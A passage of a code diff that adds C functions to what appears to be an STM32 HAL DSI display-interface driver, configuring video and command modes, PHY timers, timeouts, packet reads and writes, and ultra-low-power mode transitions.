hdsi->Instance->LVCIDR |= VidCfg->VirtualChannelID; + + /* Configure the polarity of control signals */ + hdsi->Instance->LPCR &= ~(DSI_LPCR_DEP | DSI_LPCR_VSP | DSI_LPCR_HSP); + hdsi->Instance->LPCR |= (VidCfg->DEPolarity | VidCfg->VSPolarity | VidCfg->HSPolarity); + + /* Select the color coding for the host */ + hdsi->Instance->LCOLCR &= ~DSI_LCOLCR_COLC; + hdsi->Instance->LCOLCR |= VidCfg->ColorCoding; + + /* Select the color coding for the wrapper */ + hdsi->Instance->WCFGR &= ~DSI_WCFGR_COLMUX; + hdsi->Instance->WCFGR |= ((VidCfg->ColorCoding) << 1U); + + /* Enable/disable the loosely packed variant to 18-bit configuration */ + if (VidCfg->ColorCoding == DSI_RGB666) + { + hdsi->Instance->LCOLCR &= ~DSI_LCOLCR_LPE; + hdsi->Instance->LCOLCR |= VidCfg->LooselyPacked; + } + + /* Set the Horizontal Synchronization Active (HSA) in lane byte clock cycles */ + hdsi->Instance->VHSACR &= ~DSI_VHSACR_HSA; + hdsi->Instance->VHSACR |= VidCfg->HorizontalSyncActive; + + /* Set the Horizontal Back Porch (HBP) in lane byte clock cycles */ + hdsi->Instance->VHBPCR &= ~DSI_VHBPCR_HBP; + hdsi->Instance->VHBPCR |= VidCfg->HorizontalBackPorch; + + /* Set the total line time (HLINE=HSA+HBP+HACT+HFP) in lane byte clock cycles */ + hdsi->Instance->VLCR &= ~DSI_VLCR_HLINE; + hdsi->Instance->VLCR |= VidCfg->HorizontalLine; + + /* Set the Vertical Synchronization Active (VSA) */ + hdsi->Instance->VVSACR &= ~DSI_VVSACR_VSA; + hdsi->Instance->VVSACR |= VidCfg->VerticalSyncActive; + + /* Set the Vertical Back Porch (VBP)*/ + hdsi->Instance->VVBPCR &= ~DSI_VVBPCR_VBP; + hdsi->Instance->VVBPCR |= VidCfg->VerticalBackPorch; + + /* Set the Vertical Front Porch (VFP)*/ + hdsi->Instance->VVFPCR &= ~DSI_VVFPCR_VFP; + hdsi->Instance->VVFPCR |= VidCfg->VerticalFrontPorch; + + /* Set the Vertical Active period*/ + hdsi->Instance->VVACR &= ~DSI_VVACR_VA; + hdsi->Instance->VVACR |= VidCfg->VerticalActive; + + /* Configure the command transmission mode */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPCE; + hdsi->Instance->VMCR |= VidCfg->LPCommandEnable; + + /* Low power largest packet size */ + hdsi->Instance->LPMCR &= ~DSI_LPMCR_LPSIZE; + hdsi->Instance->LPMCR |= ((VidCfg->LPLargestPacketSize) << 16U); + + /* Low power VACT largest packet size */ + hdsi->Instance->LPMCR &= ~DSI_LPMCR_VLPSIZE; + hdsi->Instance->LPMCR |= VidCfg->LPVACTLargestPacketSize; + + /* Enable LP transition in HFP period */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPHFPE; + hdsi->Instance->VMCR |= VidCfg->LPHorizontalFrontPorchEnable; + + /* Enable LP transition in HBP period */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPHBPE; + hdsi->Instance->VMCR |= VidCfg->LPHorizontalBackPorchEnable; + + /* Enable LP transition in VACT period */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPVAE; + hdsi->Instance->VMCR |= VidCfg->LPVerticalActiveEnable; + + /* Enable LP transition in VFP period */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPVFPE; + hdsi->Instance->VMCR |= VidCfg->LPVerticalFrontPorchEnable; + + /* Enable LP transition in VBP period */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPVBPE; + hdsi->Instance->VMCR |= VidCfg->LPVerticalBackPorchEnable; + + /* Enable LP transition in vertical sync period */ + hdsi->Instance->VMCR &= ~DSI_VMCR_LPVSAE; + hdsi->Instance->VMCR |= VidCfg->LPVerticalSyncActiveEnable; + + /* Enable the request for an acknowledge response at the end of a frame */ + hdsi->Instance->VMCR &= ~DSI_VMCR_FBTAAE; + hdsi->Instance->VMCR |= VidCfg->FrameBTAAcknowledgeEnable; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Select adapted command mode and configure the corresponding parameters + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param CmdCfg pointer to a DSI_CmdCfgTypeDef structure that contains + * the DSI command mode configuration parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigAdaptedCommandMode(DSI_HandleTypeDef *hdsi, DSI_CmdCfgTypeDef *CmdCfg) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_COLOR_CODING(CmdCfg->ColorCoding)); + assert_param(IS_DSI_TE_SOURCE(CmdCfg->TearingEffectSource)); + assert_param(IS_DSI_TE_POLARITY(CmdCfg->TearingEffectPolarity)); + assert_param(IS_DSI_AUTOMATIC_REFRESH(CmdCfg->AutomaticRefresh)); + assert_param(IS_DSI_VS_POLARITY(CmdCfg->VSyncPol)); + assert_param(IS_DSI_TE_ACK_REQUEST(CmdCfg->TEAcknowledgeRequest)); + assert_param(IS_DSI_DE_POLARITY(CmdCfg->DEPolarity)); + assert_param(IS_DSI_VSYNC_POLARITY(CmdCfg->VSPolarity)); + assert_param(IS_DSI_HSYNC_POLARITY(CmdCfg->HSPolarity)); + + /* Select command mode by setting CMDM and DSIM bits */ + hdsi->Instance->MCR |= DSI_MCR_CMDM; + hdsi->Instance->WCFGR &= ~DSI_WCFGR_DSIM; + hdsi->Instance->WCFGR |= DSI_WCFGR_DSIM; + + /* Select the virtual channel for the LTDC interface traffic */ + hdsi->Instance->LVCIDR &= ~DSI_LVCIDR_VCID; + hdsi->Instance->LVCIDR |= CmdCfg->VirtualChannelID; + + /* Configure the polarity of control signals */ + hdsi->Instance->LPCR &= ~(DSI_LPCR_DEP | DSI_LPCR_VSP | DSI_LPCR_HSP); + hdsi->Instance->LPCR |= (CmdCfg->DEPolarity | CmdCfg->VSPolarity | CmdCfg->HSPolarity); + + /* Select the color coding for the host */ + hdsi->Instance->LCOLCR &= ~DSI_LCOLCR_COLC; + hdsi->Instance->LCOLCR |= CmdCfg->ColorCoding; + + /* Select the color coding for the wrapper */ + hdsi->Instance->WCFGR &= ~DSI_WCFGR_COLMUX; + hdsi->Instance->WCFGR |= ((CmdCfg->ColorCoding) << 1U); + + /* Configure the maximum allowed size for write memory command */ + hdsi->Instance->LCCR &= ~DSI_LCCR_CMDSIZE; + hdsi->Instance->LCCR |= CmdCfg->CommandSize; + + /* Configure the tearing effect source and polarity and select the refresh mode */ + hdsi->Instance->WCFGR &= ~(DSI_WCFGR_TESRC | DSI_WCFGR_TEPOL | DSI_WCFGR_AR | DSI_WCFGR_VSPOL); + hdsi->Instance->WCFGR |= (CmdCfg->TearingEffectSource | CmdCfg->TearingEffectPolarity | CmdCfg->AutomaticRefresh | + CmdCfg->VSyncPol); + + /* Configure the tearing effect acknowledge request */ + hdsi->Instance->CMCR &= ~DSI_CMCR_TEARE; + hdsi->Instance->CMCR |= CmdCfg->TEAcknowledgeRequest; + + /* Enable the Tearing Effect interrupt */ + __HAL_DSI_ENABLE_IT(hdsi, DSI_IT_TE); + + /* Enable the End of Refresh interrupt */ + __HAL_DSI_ENABLE_IT(hdsi, DSI_IT_ER); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Configure command transmission mode: High-speed or Low-power + * and enable/disable acknowledge request after packet transmission + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param LPCmd pointer to a DSI_LPCmdTypeDef structure that contains + * the DSI command transmission mode configuration parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigCommand(DSI_HandleTypeDef *hdsi, DSI_LPCmdTypeDef *LPCmd) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + assert_param(IS_DSI_LP_GSW0P(LPCmd->LPGenShortWriteNoP)); + assert_param(IS_DSI_LP_GSW1P(LPCmd->LPGenShortWriteOneP)); + assert_param(IS_DSI_LP_GSW2P(LPCmd->LPGenShortWriteTwoP)); + assert_param(IS_DSI_LP_GSR0P(LPCmd->LPGenShortReadNoP)); + assert_param(IS_DSI_LP_GSR1P(LPCmd->LPGenShortReadOneP)); + assert_param(IS_DSI_LP_GSR2P(LPCmd->LPGenShortReadTwoP)); + assert_param(IS_DSI_LP_GLW(LPCmd->LPGenLongWrite)); + assert_param(IS_DSI_LP_DSW0P(LPCmd->LPDcsShortWriteNoP)); + assert_param(IS_DSI_LP_DSW1P(LPCmd->LPDcsShortWriteOneP)); + assert_param(IS_DSI_LP_DSR0P(LPCmd->LPDcsShortReadNoP)); + assert_param(IS_DSI_LP_DLW(LPCmd->LPDcsLongWrite)); + assert_param(IS_DSI_LP_MRDP(LPCmd->LPMaxReadPacket)); + assert_param(IS_DSI_ACK_REQUEST(LPCmd->AcknowledgeRequest)); + + /* Select High-speed or Low-power for command transmission */ + hdsi->Instance->CMCR &= ~(DSI_CMCR_GSW0TX | \ + DSI_CMCR_GSW1TX | \ + DSI_CMCR_GSW2TX | \ + DSI_CMCR_GSR0TX | \ + DSI_CMCR_GSR1TX | \ + DSI_CMCR_GSR2TX | \ + DSI_CMCR_GLWTX | \ + DSI_CMCR_DSW0TX | \ + DSI_CMCR_DSW1TX | \ + DSI_CMCR_DSR0TX | \ + DSI_CMCR_DLWTX | \ + DSI_CMCR_MRDPS); + hdsi->Instance->CMCR |= (LPCmd->LPGenShortWriteNoP | \ + LPCmd->LPGenShortWriteOneP | \ + LPCmd->LPGenShortWriteTwoP | \ + LPCmd->LPGenShortReadNoP | \ + LPCmd->LPGenShortReadOneP | \ + LPCmd->LPGenShortReadTwoP | \ + LPCmd->LPGenLongWrite | \ + LPCmd->LPDcsShortWriteNoP | \ + LPCmd->LPDcsShortWriteOneP | \ + LPCmd->LPDcsShortReadNoP | \ + LPCmd->LPDcsLongWrite | \ + LPCmd->LPMaxReadPacket); + + /* Configure the acknowledge request after each packet transmission */ + hdsi->Instance->CMCR &= ~DSI_CMCR_ARE; + hdsi->Instance->CMCR |= LPCmd->AcknowledgeRequest; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Configure the flow control parameters + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param FlowControl flow control feature(s) to be enabled. + * This parameter can be any combination of @arg DSI_FlowControl. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigFlowControl(DSI_HandleTypeDef *hdsi, uint32_t FlowControl) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_FLOW_CONTROL(FlowControl)); + + /* Set the DSI Host Protocol Configuration Register */ + hdsi->Instance->PCR &= ~DSI_FLOW_CONTROL_ALL; + hdsi->Instance->PCR |= FlowControl; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Configure the DSI PHY timer parameters + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param PhyTimers DSI_PHY_TimerTypeDef structure that contains + * the DSI PHY timing parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigPhyTimer(DSI_HandleTypeDef *hdsi, DSI_PHY_TimerTypeDef *PhyTimers) +{ + uint32_t maxTime; + /* Process locked */ + __HAL_LOCK(hdsi); + + maxTime = (PhyTimers->ClockLaneLP2HSTime > PhyTimers->ClockLaneHS2LPTime) ? PhyTimers->ClockLaneLP2HSTime : + PhyTimers->ClockLaneHS2LPTime; + + /* Clock lane timer configuration */ + + /* In Automatic Clock Lane control mode, the DSI Host can turn off the clock lane between two + High-Speed transmission. + To do so, the DSI Host calculates the time required for the clock lane to change from HighSpeed + to Low-Power and from Low-Power to High-Speed. + This timings are configured by the HS2LP_TIME and LP2HS_TIME in the DSI Host Clock Lane Timer Configuration Register (DSI_CLTCR). + But the DSI Host is not calculating LP2HS_TIME + HS2LP_TIME but 2 x HS2LP_TIME. + + Workaround : Configure HS2LP_TIME and LP2HS_TIME with the same value being the max of HS2LP_TIME or LP2HS_TIME. + */ + hdsi->Instance->CLTCR &= ~(DSI_CLTCR_LP2HS_TIME | DSI_CLTCR_HS2LP_TIME); + hdsi->Instance->CLTCR |= (maxTime | ((maxTime) << 16U)); + + /* Data lane timer configuration */ + hdsi->Instance->DLTCR &= ~(DSI_DLTCR_MRD_TIME | DSI_DLTCR_LP2HS_TIME | DSI_DLTCR_HS2LP_TIME); + hdsi->Instance->DLTCR |= (PhyTimers->DataLaneMaxReadTime | ((PhyTimers->DataLaneLP2HSTime) << 16U) | (( + PhyTimers->DataLaneHS2LPTime) << 24U)); + + /* Configure the wait period to request HS transmission after a stop state */ + hdsi->Instance->PCONFR &= ~DSI_PCONFR_SW_TIME; + hdsi->Instance->PCONFR |= ((PhyTimers->StopWaitTime) << 8U); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Configure the DSI HOST timeout parameters + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param HostTimeouts DSI_HOST_TimeoutTypeDef structure that contains + * the DSI host timeout parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigHostTimeouts(DSI_HandleTypeDef *hdsi, DSI_HOST_TimeoutTypeDef *HostTimeouts) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Set the timeout clock division factor */ + hdsi->Instance->CCR &= ~DSI_CCR_TOCKDIV; + hdsi->Instance->CCR |= ((HostTimeouts->TimeoutCkdiv) << 8U); + + /* High-speed transmission timeout */ + hdsi->Instance->TCCR[0U] &= ~DSI_TCCR0_HSTX_TOCNT; + hdsi->Instance->TCCR[0U] |= ((HostTimeouts->HighSpeedTransmissionTimeout) << 16U); + + /* Low-power reception timeout */ + hdsi->Instance->TCCR[0U] &= ~DSI_TCCR0_LPRX_TOCNT; + hdsi->Instance->TCCR[0U] |= HostTimeouts->LowPowerReceptionTimeout; + + /* High-speed read timeout */ + hdsi->Instance->TCCR[1U] &= ~DSI_TCCR1_HSRD_TOCNT; + hdsi->Instance->TCCR[1U] |= HostTimeouts->HighSpeedReadTimeout; + + /* Low-power read timeout */ + hdsi->Instance->TCCR[2U] &= ~DSI_TCCR2_LPRD_TOCNT; + hdsi->Instance->TCCR[2U] |= HostTimeouts->LowPowerReadTimeout; + + /* High-speed write timeout */ + hdsi->Instance->TCCR[3U] &= ~DSI_TCCR3_HSWR_TOCNT; + hdsi->Instance->TCCR[3U] |= HostTimeouts->HighSpeedWriteTimeout; + + /* High-speed write presp mode */ + hdsi->Instance->TCCR[3U] &= ~DSI_TCCR3_PM; + hdsi->Instance->TCCR[3U] |= HostTimeouts->HighSpeedWritePrespMode; + + /* Low-speed write timeout */ + hdsi->Instance->TCCR[4U] &= ~DSI_TCCR4_LPWR_TOCNT; + hdsi->Instance->TCCR[4U] |= HostTimeouts->LowPowerWriteTimeout; + + /* BTA timeout */ + hdsi->Instance->TCCR[5U] &= ~DSI_TCCR5_BTA_TOCNT; + hdsi->Instance->TCCR[5U] |= HostTimeouts->BTATimeout; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Start the DSI module + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_Start(DSI_HandleTypeDef *hdsi) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Enable the DSI host */ + __HAL_DSI_ENABLE(hdsi); + + /* Enable the DSI wrapper */ + __HAL_DSI_WRAPPER_ENABLE(hdsi); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Stop the DSI module + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_Stop(DSI_HandleTypeDef *hdsi) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Disable the DSI host */ + __HAL_DSI_DISABLE(hdsi); + + /* Disable the DSI wrapper */ + __HAL_DSI_WRAPPER_DISABLE(hdsi); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Refresh the display in command mode + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_Refresh(DSI_HandleTypeDef *hdsi) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Update the display */ + hdsi->Instance->WCR |= DSI_WCR_LTDCEN; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Controls the display color mode in Video mode + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param ColorMode Color mode (full or 8-colors). + * This parameter can be any value of @arg DSI_Color_Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ColorMode(DSI_HandleTypeDef *hdsi, uint32_t ColorMode) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_COLOR_MODE(ColorMode)); + + /* Update the display color mode */ + hdsi->Instance->WCR &= ~DSI_WCR_COLM; + hdsi->Instance->WCR |= ColorMode; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Control the display shutdown in Video mode + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param Shutdown Shut-down (Display-ON or Display-OFF). + * This parameter can be any value of @arg DSI_ShutDown + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_Shutdown(DSI_HandleTypeDef *hdsi, uint32_t Shutdown) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_SHUT_DOWN(Shutdown)); + + /* Update the display Shutdown */ + hdsi->Instance->WCR &= ~DSI_WCR_SHTDN; + hdsi->Instance->WCR |= Shutdown; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief write short DCS or short Generic command + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param ChannelID Virtual channel ID. + * @param Mode DSI short packet data type. + * This parameter can be any value of @arg DSI_SHORT_WRITE_PKT_Data_Type. + * @param Param1 DSC command or first generic parameter. + * This parameter can be any value of @arg DSI_DCS_Command or a + * generic command code. + * @param Param2 DSC parameter or second generic parameter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ShortWrite(DSI_HandleTypeDef *hdsi, + uint32_t ChannelID, + uint32_t Mode, + uint32_t Param1, + uint32_t Param2) +{ + HAL_StatusTypeDef status; + /* Check the parameters */ + assert_param(IS_DSI_SHORT_WRITE_PACKET_TYPE(Mode)); + + /* Process locked */ + __HAL_LOCK(hdsi); + + status = DSI_ShortWrite(hdsi, ChannelID, Mode, Param1, Param2); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return status; +} + +/** + * @brief write long DCS or long Generic command + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param ChannelID Virtual channel ID. + * @param Mode DSI long packet data type. + * This parameter can be any value of @arg DSI_LONG_WRITE_PKT_Data_Type. + * @param NbParams Number of parameters. + * @param Param1 DSC command or first generic parameter. + * This parameter can be any value of @arg DSI_DCS_Command or a + * generic command code + * @param ParametersTable Pointer to parameter values table. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_LongWrite(DSI_HandleTypeDef *hdsi, + uint32_t ChannelID, + uint32_t Mode, + uint32_t NbParams, + uint32_t Param1, + uint8_t *ParametersTable) +{ + uint32_t uicounter, nbBytes, count; + uint32_t tickstart; + uint32_t fifoword; + uint8_t *pparams = ParametersTable; + + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_LONG_WRITE_PACKET_TYPE(Mode)); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait for Command FIFO Empty */ + while ((hdsi->Instance->GPSR & DSI_GPSR_CMDFE) == 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + + /* Set the DCS code on payload byte 1, and the other parameters on the write FIFO command*/ + fifoword = Param1; + nbBytes = (NbParams < 3U) ? NbParams : 3U; + + for (count = 0U; count < nbBytes; count++) + { + fifoword |= (((uint32_t)(*(pparams + count))) << (8U + (8U * count))); + } + hdsi->Instance->GPDR = fifoword; + + uicounter = NbParams - nbBytes; + pparams += nbBytes; + /* Set the Next parameters on the write FIFO command*/ + while (uicounter != 0U) + { + nbBytes = (uicounter < 4U) ? uicounter : 4U; + fifoword = 0U; + for (count = 0U; count < nbBytes; count++) + { + fifoword |= (((uint32_t)(*(pparams + count))) << (8U * count)); + } + hdsi->Instance->GPDR = fifoword; + + uicounter -= nbBytes; + pparams += nbBytes; + } + + /* Configure the packet to send a long DCS command */ + DSI_ConfigPacketHeader(hdsi->Instance, + ChannelID, + Mode, + ((NbParams + 1U) & 0x00FFU), + (((NbParams + 1U) & 0xFF00U) >> 8U)); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Read command (DCS or generic) + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param ChannelNbr Virtual channel ID + * @param Array pointer to a buffer to store the payload of a read back operation. + * @param Size Data size to be read (in byte). + * @param Mode DSI read packet data type. + * This parameter can be any value of @arg DSI_SHORT_READ_PKT_Data_Type. + * @param DCSCmd DCS get/read command. + * @param ParametersTable Pointer to parameter values table. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_Read(DSI_HandleTypeDef *hdsi, + uint32_t ChannelNbr, + uint8_t *Array, + uint32_t Size, + uint32_t Mode, + uint32_t DCSCmd, + uint8_t *ParametersTable) +{ + uint32_t tickstart; + uint8_t *pdata = Array; + uint32_t datasize = Size; + uint32_t fifoword; + uint32_t nbbytes; + uint32_t count; + + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_READ_PACKET_TYPE(Mode)); + + if (datasize > 2U) + { + /* set max return packet size */ + if (DSI_ShortWrite(hdsi, ChannelNbr, DSI_MAX_RETURN_PKT_SIZE, ((datasize) & 0xFFU), + (((datasize) >> 8U) & 0xFFU)) != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + } + + /* Configure the packet to read command */ + if (Mode == DSI_DCS_SHORT_PKT_READ) + { + DSI_ConfigPacketHeader(hdsi->Instance, ChannelNbr, Mode, DCSCmd, 0U); + } + else if (Mode == DSI_GEN_SHORT_PKT_READ_P0) + { + DSI_ConfigPacketHeader(hdsi->Instance, ChannelNbr, Mode, 0U, 0U); + } + else if (Mode == DSI_GEN_SHORT_PKT_READ_P1) + { + DSI_ConfigPacketHeader(hdsi->Instance, ChannelNbr, Mode, ParametersTable[0U], 0U); + } + else if (Mode == DSI_GEN_SHORT_PKT_READ_P2) + { + DSI_ConfigPacketHeader(hdsi->Instance, ChannelNbr, Mode, ParametersTable[0U], ParametersTable[1U]); + } + else + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* If DSI fifo is not empty, read requested bytes */ + while (((int32_t)(datasize)) > 0) + { + if ((hdsi->Instance->GPSR & DSI_GPSR_PRDFE) == 0U) + { + fifoword = hdsi->Instance->GPDR; + nbbytes = (datasize < 4U) ? datasize : 4U; + + for (count = 0U; count < nbbytes; count++) + { + *pdata = (uint8_t)(fifoword >> (8U * count)); + pdata++; + datasize--; + } + } + + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Enter the ULPM (Ultra Low Power Mode) with the D-PHY PLL running + * (only data lanes are in ULPM) + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_EnterULPMData(DSI_HandleTypeDef *hdsi) +{ + uint32_t tickstart; + + /* Process locked */ + __HAL_LOCK(hdsi); + + /* ULPS Request on Data Lanes */ + hdsi->Instance->PUCR |= DSI_PUCR_URDL; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until the D-PHY active lanes enter into ULPM */ + if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_ONE_DATA_LANE) + { + while ((hdsi->Instance->PSR & DSI_PSR_UAN0) != 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_TWO_DATA_LANES) + { + while ((hdsi->Instance->PSR & (DSI_PSR_UAN0 | DSI_PSR_UAN1)) != 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Exit the ULPM (Ultra Low Power Mode) with the D-PHY PLL running + * (only data lanes are in ULPM) + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ExitULPMData(DSI_HandleTypeDef *hdsi) +{ + uint32_t tickstart; + + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Exit ULPS on Data Lanes */ + hdsi->Instance->PUCR |= DSI_PUCR_UEDL; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until all active lanes exit ULPM */ + if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_ONE_DATA_LANE) + { + while ((hdsi->Instance->PSR & DSI_PSR_UAN0) != DSI_PSR_UAN0) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_TWO_DATA_LANES) + { + while ((hdsi->Instance->PSR & (DSI_PSR_UAN0 | DSI_PSR_UAN1)) != (DSI_PSR_UAN0 | DSI_PSR_UAN1)) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + + /* wait for 1 ms*/ + HAL_Delay(1U); + + /* De-assert the ULPM requests and the ULPM exit bits */ + hdsi->Instance->PUCR = 0U; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Enter the ULPM (Ultra Low Power Mode) with the D-PHY PLL turned off + * (both data and clock lanes are in ULPM) + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_EnterULPM(DSI_HandleTypeDef *hdsi) +{ + uint32_t tickstart; + + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Clock lane configuration: no more HS request */ + hdsi->Instance->CLCR &= ~DSI_CLCR_DPCC; + + /* Use system PLL as byte lane clock source before stopping DSIPHY clock source */ + __HAL_RCC_DSI_CONFIG(RCC_DSICLKSOURCE_PLLR); + + /* ULPS Request on Clock and Data Lanes */ + hdsi->Instance->PUCR |= (DSI_PUCR_URCL | DSI_PUCR_URDL); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until all active lanes exit ULPM */ + if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_ONE_DATA_LANE) + { + while ((hdsi->Instance->PSR & (DSI_PSR_UAN0 | DSI_PSR_UANC)) != 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_TWO_DATA_LANES) + { + while ((hdsi->Instance->PSR & (DSI_PSR_UAN0 | DSI_PSR_UAN1 | DSI_PSR_UANC)) != 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + + /* Turn off the DSI PLL */ + __HAL_DSI_PLL_DISABLE(hdsi); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Exit the ULPM (Ultra Low Power Mode) with the D-PHY PLL turned off + * (both data and clock lanes are 